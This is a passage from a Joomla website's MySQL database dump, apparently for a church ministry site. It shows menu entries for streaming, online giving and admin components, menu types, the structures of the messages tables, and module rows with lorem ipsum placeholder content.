(1105, 'streaming', 'Private Streaming', 'private', '', 'private', 'index.php?option=com_content&view=article&id=125', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 417, 418, 0, '*', 0);
INSERT INTO `y57u5_menu` (`id`, `menutype`, `title`, `alias`, `note`, `path`, `link`, `type`, `published`, `parent_id`, `level`, `component_id`, `checked_out`, `checked_out_time`, `browserNav`, `access`, `img`, `template_style_id`, `params`, `lft`, `rgt`, `home`, `language`, `client_id`) VALUES
(1106, 'streaming', 'Pastoral Training', 'training', '', 'training', 'index.php?option=com_content&view=article&id=126', 'component', 1, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 419, 420, 0, '*', 0),
(1108, 'main', 'com_associations', 'multilingual-associations', '', 'multilingual-associations', 'index.php?option=com_associations', 'component', 1, 1, 1, 34, 0, '0000-00-00 00:00:00', 0, 1, 'class:associations', 0, '{}', 421, 422, 0, '*', 1),
(1120, 'bottommenu', 'Divine Agenda for Dream Centre Men', 'divine-agenda', '', 'divine-agenda', 'index.php?option=com_k2&view=item&layout=item&id=54', 'component', 1, 1, 1, 10279, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 423, 424, 0, '*', 0),
(1122, 'mainmenu', 'WOW 2017', 'wow-2017', '', 'wow-2017', 'index.php?option=com_vikevents&view=category&category_id=1', 'component', -2, 1, 1, 10522, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 425, 426, 0, '*', 0),
(1123, 'mainmenu', 'WOW 2017', 'wow', '', 'wow', 'wow2017', 'url', 0, 1, 1, 0, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 427, 428, 0, '*', 0),
(1125, 'bottommenu', 'T', 't', '', 't', 'index.php?option=com_wrapper&view=wrapper', 'component', 0, 1, 1, 2, 0, '0000-00-00 00:00:00', 0, 1, ' ', 28, '{\"url\":\"http:\\/\\/lifeoasisinternationalchurch.org\\/registration\",\"scrolling\":\"auto\",\"width\":\"100%\",\"height\":\"1500\",\"height_auto\":\"0\",\"add_scheme\":\"1\",\"frameborder\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 429, 430, 0, '*', 0),
(1130, 'vertical-menu', '35thanniversary', '35thanniversary-old', '', '35thanniversary-old', 'index.php?option=com_content&view=article&id=129', 'component', 0, 1, 1, 22, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"info_block_show_title\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_associations\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 433, 434, 0, '*', 0),
(1131, 'main', 'COM_SJ_NEWSLETTER', 'com-sj-newsletter', '', 'com-sj-newsletter', 'index.php?option=com_sj_newsletter', 'component', 1, 1, 1, 10541, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_sj_newsletter/images/s_com_sj_newsletter.png', 0, '{}', 435, 440, 0, '', 1),
(1132, 'main', 'COM_SJ_NEWSLETTER_TITLE_EMAILS', 'com-sj-newsletter-title-emails', '', 'com-sj-newsletter/com-sj-newsletter-title-emails', 'index.php?option=com_sj_newsletter&view=emails', 'component', 1, 1131, 2, 10541, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_sj_newsletter/images/s_emails.png', 0, '{}', 436, 437, 0, '', 1),
(1133, 'main', 'COM_SJ_NEWSLETTER_TITLE_EMAILCONTENTS', 'com-sj-newsletter-title-emailcontents', '', 'com-sj-newsletter/com-sj-newsletter-title-emailcontents', 'index.php?option=com_sj_newsletter&view=emailcontents', 'component', 1, 1131, 2, 10541, 0, '0000-00-00 00:00:00', 0, 1, 'media/com_sj_newsletter/images/s_emailcontents.png', 0, '{}', 438, 439, 0, '', 1),
(1134, 'main', 'COM_RSTBOX', 'com-rstbox', '', 'com-rstbox', 'index.php?option=com_rstbox', 'component', 1, 1, 1, 10544, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 441, 442, 0, '', 1),
(1145, 'main', 'COM_CONVERTFORMS', 'com-convertforms', '', 'com-convertforms', 'index.php?option=com_convertforms', 'component', 1, 1, 1, 10557, 0, '0000-00-00 00:00:00', 0, 1, 'class:banners', 0, '{}', 443, 452, 0, '', 1),
(1146, 'main', 'COM_CONVERTFORMS_FORMS', 'com-convertforms-forms', '', 'com-convertforms/com-convertforms-forms', 'index.php?option=com_convertforms&view=forms', 'component', 1, 1145, 2, 10557, 0, '0000-00-00 00:00:00', 0, 1, 'class:forms', 0, '{}', 444, 445, 0, '', 1),
(1147, 'main', 'COM_CONVERTFORMS_CAMPAIGNS', 'com-convertforms-campaigns', '', 'com-convertforms/com-convertforms-campaigns', 'index.php?option=com_convertforms&view=campaigns', 'component', 1, 1145, 2, 10557, 0, '0000-00-00 00:00:00', 0, 1, 'class:campaigns', 0, '{}', 446, 447, 0, '', 1),
(1148, 'main', 'COM_CONVERTFORMS_LEADS', 'com-convertforms-leads', '', 'com-convertforms/com-convertforms-leads', 'index.php?option=com_convertforms&view=conversions', 'component', 1, 1145, 2, 10557, 0, '0000-00-00 00:00:00', 0, 1, 'class:conversions', 0, '{}', 448, 449, 0, '', 1),
(1149, 'main', 'COM_CONVERTFORMS_ADDONS', 'com-convertforms-addons', '', 'com-convertforms/com-convertforms-addons', 'index.php?option=com_convertforms&view=addons', 'component', 1, 1145, 2, 10557, 0, '0000-00-00 00:00:00', 0, 1, 'class:addons', 0, '{}', 450, 451, 0, '', 1),
(1150, 'main', 'COM_JCE', 'com-jce', '', 'com-jce', 'index.php?option=com_jce&view=cpanel', 'component', 1, 1, 1, 10531, 0, '0000-00-00 00:00:00', 0, 1, 'components/com_jce/media/img/menu/logo.png', 0, '{}', 453, 460, 0, '', 1),
(1151, 'main', 'COM_JCE_MENU_CPANEL', 'com-jce-menu-cpanel', '', 'com-jce/com-jce-menu-cpanel', 'index.php?option=com_jce', 'component', 1, 1150, 2, 10531, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 454, 455, 0, '', 1),
(1152, 'main', 'COM_JCE_MENU_CONFIG', 'com-jce-menu-config', '', 'com-jce/com-jce-menu-config', 'index.php?option=com_jce&view=config', 'component', 1, 1150, 2, 10531, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 456, 457, 0, '', 1),
(1153, 'main', 'COM_JCE_MENU_PROFILES', 'com-jce-menu-profiles', '', 'com-jce/com-jce-menu-profiles', 'index.php?option=com_jce&view=profiles', 'component', 1, 1150, 2, 10531, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 458, 459, 0, '', 1),
(1154, 'main', 'COM_JEVENTS_MENU', 'com-jevents-menu', '', 'com-jevents-menu', 'index.php?option=com_jevents', 'component', 1, 1, 1, 10224, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 461, 462, 0, '', 1),
(1155, 'main', 'COM_K2', 'com-k2', '', 'com-k2', 'index.php?option=com_k2&view=items', 'component', 1, 1, 1, 10279, 0, '0000-00-00 00:00:00', 0, 1, '../media/k2/assets/images/backend/k2_logo_16x16.png', 0, '{}', 463, 484, 0, '', 1),
(1156, 'main', 'K2_ITEMS', 'k2-items', '', 'com-k2/k2-items', 'index.php?option=com_k2&view=items', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 464, 465, 0, '', 1),
(1157, 'main', 'K2_CATEGORIES', 'k2-categories', '', 'com-k2/k2-categories', 'index.php?option=com_k2&view=categories', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 466, 467, 0, '', 1),
(1158, 'main', 'K2_TAGS', 'k2-tags', '', 'com-k2/k2-tags', 'index.php?option=com_k2&view=tags', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 468, 469, 0, '', 1),
(1159, 'main', 'K2_COMMENTS', 'k2-comments', '', 'com-k2/k2-comments', 'index.php?option=com_k2&view=comments', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 470, 471, 0, '', 1),
(1160, 'main', 'K2_USERS', 'k2-users', '', 'com-k2/k2-users', 'index.php?option=com_k2&view=users', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 472, 473, 0, '', 1),
(1161, 'main', 'K2_USER_GROUPS', 'k2-user-groups', '', 'com-k2/k2-user-groups', 'index.php?option=com_k2&view=usergroups', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 474, 475, 0, '', 1),
(1162, 'main', 'K2_EXTRA_FIELDS', 'k2-extra-fields', '', 'com-k2/k2-extra-fields', 'index.php?option=com_k2&view=extrafields', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 476, 477, 0, '', 1),
(1163, 'main', 'K2_EXTRA_FIELD_GROUPS', 'k2-extra-field-groups', '', 'com-k2/k2-extra-field-groups', 'index.php?option=com_k2&view=extrafieldsgroups', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 478, 479, 0, '', 1),
(1164, 'main', 'K2_MEDIA_MANAGER', 'k2-media-manager', '', 'com-k2/k2-media-manager', 'index.php?option=com_k2&view=media', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 480, 481, 0, '', 1),
(1165, 'main', 'K2_INFORMATION', 'k2-information', '', 'com-k2/k2-information', 'index.php?option=com_k2&view=info', 'component', 1, 1155, 2, 10279, 0, '0000-00-00 00:00:00', 0, 1, 'class:component', 0, '{}', 482, 483, 0, '', 1),
(1166, 'mainmenu', 'Tithe & Offering', 'tithe-offering', '', 'online-giving/tithe-offering', 'index.php?option=com_wrapper&view=wrapper', 'component', 0, 1079, 2, 2, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"url\":\"https:\\/\\/lifeoasisinternationalchurch.org\\/offering-tithe\\/\",\"scrolling\":\"auto\",\"width\":\"100%\",\"height\":\"500\",\"height_auto\":\"0\",\"add_scheme\":\"1\",\"frameborder\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 144, 145, 0, '*', 0),
(1167, 'mainmenu', 'Partnership and Seeds', 'seeds', '', 'online-giving/seeds', 'https://solaareogunministries.org/seeds/', 'url', 1, 1079, 2, 0, 0, '0000-00-00 00:00:00', 1, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu-anchor_rel\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 140, 141, 0, '*', 0),
(1168, 'live-streaming', '24 Hours Livestreaming Schedule', 'broadcast-schedule', '', 'broadcast-schedule', 'index.php?option=com_jumi&view=application&fileid=12', 'component', 1, 1, 1, 10463, 0, '0000-00-00 00:00:00', 0, 1, ' ', 0, '{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_image_css\":\"\",\"menu_text\":1,\"menu_show\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"icemega_subtitle\":\"\",\"icemega_cols\":\"1\",\"icemega_width\":\"\",\"icemega_colwidth\":\"\",\"icemega_cols_items\":\"\",\"icemega_subtype\":\"menu\"}', 485, 486, 0, '*', 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_menu_types`
--

CREATE TABLE `y57u5_menu_types` (
  `id` int(10) UNSIGNED NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `menutype` varchar(24) COLLATE utf8mb4_unicode_ci NOT NULL,
  `title` varchar(48) COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` int(11) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_menu_types`
--

INSERT INTO `y57u5_menu_types` (`id`, `asset_id`, `menutype`, `title`, `description`, `client_id`) VALUES
(1, 0, 'mainmenu', 'Main Menu', 'The main menu for the site', 0),
(2, 0, 'bottommenu', 'Bottom Menu', '', 0),
(3, 0, 'sidebarmenu', 'Sidebar Menu', '', 0),
(4, 0, 'quickmenu', 'Quick Menu', '', 0),
(10, 0, 'portfolio-menu', 'Portfolio menu', 'Portfolio menu', 0),
(11, 0, 'vertical-menu', 'Vertical Menu', '', 0),
(12, 321, 'live-streaming', 'Live Streaming', 'Live Streaming', 0),
(14, 360, 'streaming', 'streaming', 'streaming', 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_messages`
--

CREATE TABLE `y57u5_messages` (
  `message_id` int(10) UNSIGNED NOT NULL,
  `user_id_from` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `user_id_to` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `folder_id` tinyint(3) UNSIGNED NOT NULL DEFAULT '0',
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `state` tinyint(1) NOT NULL DEFAULT '0',
  `priority` tinyint(1) UNSIGNED NOT NULL DEFAULT '0',
  `subject` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message` text COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_messages_cfg`
--

CREATE TABLE `y57u5_messages_cfg` (
  `user_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `cfg_name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `cfg_value` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_modules`
--

CREATE TABLE `y57u5_modules` (
  `id` int(11) NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `content` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `position` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `module` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `access` int(10) UNSIGNED DEFAULT NULL,
  `showtitle` tinyint(3) UNSIGNED NOT NULL DEFAULT '1',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_modules`
--

INSERT INTO `y57u5_modules` (`id`, `asset_id`, `title`, `note`, `content`, `ordering`, `position`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `published`, `module`, `access`, `showtitle`, `params`, `client_id`, `language`) VALUES
(1, 359, 'Main Menu', '', '', 1, 'menu', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_menu', 1, 1, '{\"menutype\":\"mainmenu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(2, 0, 'Login', '', '', 1, 'login', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_login', 1, 1, '', 1, '*'),
(3, 0, 'Popular Articles', '', '', 3, 'cpanel', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_popular', 3, 1, '{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}', 1, '*'),
(4, 0, 'Recently Added Articles', '', '', 4, 'cpanel', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_latest', 3, 1, '{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}', 1, '*'),
(6, 0, 'Unread Messages', '', '', 1, 'header', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_unread', 3, 1, '', 1, '*'),
(7, 0, 'Online Users', '', '', 2, 'header', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_online', 3, 1, '', 1, '*'),
(8, 0, 'Toolbar', '', '', 1, 'toolbar', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_toolbar', 3, 1, '', 1, '*'),
(9, 0, 'Quick Icons', '', '', 1, 'icon', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_quickicon', 3, 1, '', 1, '*'),
(10, 0, 'Logged-in Users', '', '', 2, 'cpanel', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_logged', 3, 1, '{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}', 1, '*'),
(12, 0, 'Admin Menu', '', '', 1, 'menu', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_menu', 3, 1, '{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}', 1, '*'),
(13, 0, 'Admin Submenu', '', '', 1, 'submenu', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_submenu', 3, 1, '', 1, '*'),
(14, 0, 'User Status', '', '', 2, 'status', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_status', 3, 1, '', 1, '*'),
(15, 0, 'Title', '', '', 1, 'title', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_title', 3, 1, '', 1, '*'),
(17, 262, 'Breadcrumbs', '', '', 1, 'breadcrumbs', 0, '0000-00-00 00:00:00', '2016-11-01 13:07:18', '0000-00-00 00:00:00', 1, 'mod_breadcrumbs', 1, 1, '{\"showHere\":\"1\",\"showHome\":\"1\",\"homeText\":\"Home\",\"showLast\":\"1\",\"separator\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(19, 0, 'Bottom A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>icon-download</code></p>', 1, 'bottom-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-download\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(20, 0, 'Bottom A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>icon-twitter</code></p>', 2, 'bottom-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-twitter\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}', 0, '*'),
(21, 274, 'Bottom A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>icon-envelope</code></p>', 3, 'bottom-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-envelope\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(22, 273, 'Bottom A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>icon-comment</code></p>', 4, 'bottom-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"icon-comment\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(27, 276, 'Bottom B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Module Class Suffix <code>badge-warning free</code></p>', 1, 'bottom-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"badge-warning free\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
